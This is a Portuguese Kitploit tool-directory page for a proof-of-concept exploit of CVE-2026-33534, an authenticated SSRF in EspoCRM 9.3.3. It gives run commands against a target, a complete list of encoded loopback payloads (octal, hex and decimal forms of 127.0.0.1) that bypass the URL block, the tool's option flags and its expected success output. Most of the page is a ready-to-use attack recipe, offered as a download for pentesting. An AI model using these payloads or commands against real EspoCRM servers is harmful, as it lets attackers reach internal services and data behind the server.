Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-33534 — EspoCRM 9.3.3 - SSRF autenticado via notação alternativa de IPv4 | Kitploit
Ferramentas/GitHubGitHub/entrovyx/cve-2026-33534
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubentrovyx/cve-2026-33534

CVE-2026-33534

EspoCRM 9.3.3 - SSRF autenticado via notação alternativa de IPv4

Ver Repositório
há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-33534 - SSRF autenticado no EspoCRM 9.3.3

Prova de conceito de SSRF autenticado para EspoCRM 9.3.3 via notação alternativa de loopback IPv4 no endpoint /api/v1/Attachment/fromImageUrl.

Resumo

O EspoCRM 9.3.3 bloqueia URLs de loopback diretas, como http://127.0.0.1/..., mas o caminho de busca no lado do servidor aceita representações alternativas de IPv4 que o cURL normaliza para loopback. Isso permite que um usuário autenticado com acesso ao fluxo afetado de upload de anexos/imagens faça o servidor EspoCRM buscar recursos internos.

O exploit primeiro envia uma solicitação de controle direta para 127.0.0.1 e espera que ela seja bloqueada com HTTP 403. Em seguida, testa múltiplos payloads de loopback codificados e relata quais produzem um anexo armazenado.

Versão Afetada

  • Vulnerável: EspoCRM 9.3.3
  • Corrigida: EspoCRM 9.3.4
  • Aviso: https://github.com/espocrm/espocrm/security/advisories/GHSA-h7gx-8gwv-7g73
  • CVE: CVE-2026-33534
  • CWE: CWE-918
  • Requisitos

    • Python 3
    • requests
    • Credenciais válidas do EspoCRM
    • Permissão para usar o campo de imagem/anexo do alvo

    Instalar dependência:

    root@kitploit:~
    python3 -m pip install requests
    

    Uso

    Validação local básica contra uma instância do EspoCRM executando na porta 8083:

    root@kitploit:~
    python3 CVE-2026-33534.py \
      -u http://127.0.0.1:8083 \
      -U admin \
      -P 'Admin12345!' \
      --internal-port 8083 \
      --cleanup
    

    Testar um serviço interno em uma porta e caminho personalizados:

    root@kitploit:~
    python3 CVE-2026-33534.py \
      -u https://target.example \
      -U user \
      -P 'password' \
      --internal-port 9002 \
      --internal-path /interno.png \
      --cleanup
    

    Usar apenas payloads personalizados:

    root@kitploit:~
    python3 CVE-2026-33534.py \
      -u https://target.example \
      -U user \
      -P 'password' \
      --no-default-payloads \
      --payload 0x7f000001 \
      --payload 2130706433
    

    Payloads Padrão

    O exploit testa estas representações de host de loopback por padrão:

    root@kitploit:~
    0177.0.0.1
    0177.0000.0000.0001
    0177.1
    0x7f.0.0.1
    0x7f.0x0.0x0.0x1
    0x7f000001
    2130706433
    017700000001
    127.1
    127.0.1
    127.000.000.001
    0000000000000000000000000177.0.0.1
    

    Arquivos de payload personalizados são suportados. Cada linha pode ser:

    root@kitploit:~
    host
    label=host
    

    Exemplo:

    root@kitploit:~
    hex-dword=0x7f000001
    decimal-dword=2130706433
    

    Execute com:

    root@kitploit:~
    python3 CVE-2026-33534.py -u https://target.example -U user -P pass --payload-file payloads.txt
    

    Opções

    root@kitploit:~
    -u, --url                 URL base do EspoCRM
    -U, --username            Nome de usuário do EspoCRM
    -P, --password            Senha do EspoCRM
    --internal-port           Porta de loopback interna a buscar
    --internal-path           Caminho interno a buscar
    --payload                 Notação adicional de host de loopback
    --payload-file            Arquivo com um payload de host por linha
    --no-default-payloads     Usar apenas payloads personalizados
    --field                   Campo de anexo, padrão: avatar
    --parent-type             Tipo de entidade pai, padrão: User
    --parent-id               ID opcional da entidade pai
    --cleanup                 Excluir anexos criados por payloads bem-sucedidos
    --stop-on-first           Parar após o primeiro bypass bem-sucedido
    --insecure                Desabilitar verificação de certificado TLS
    

    Saída Esperada

    A exploração bem-sucedida mostra o controle de loopback direto bloqueado e um ou mais payloads codificados aceitos:

    root@kitploit:~
    [*] Control response: HTTP 403 Not allowed URL.
    [+] octal dotted             0177.0.0.1        HTTP 200 id=... type=image/svg+xml size=4438
    [+] hex dword                0x7f000001        HTTP 200 id=... type=image/svg+xml size=4438
    
    [+] Vulnerable behavior confirmed.
    [+] Direct loopback control: HTTP 403
    [+] Successful payloads: 12
    

    Notas

    • O PoC padrão busca /client/img/logo-light.svg do próprio listener de loopback do alvo. Ajuste --internal-port e --internal-path para outro serviço interno.
    • O campo padrão é User.avatar; use --field, --parent-type e --parent-id se a conta testada precisar de um contexto de upload diferente.
    • Use --cleanup durante os testes para excluir anexos criados automaticamente.
    Baixar ferramenta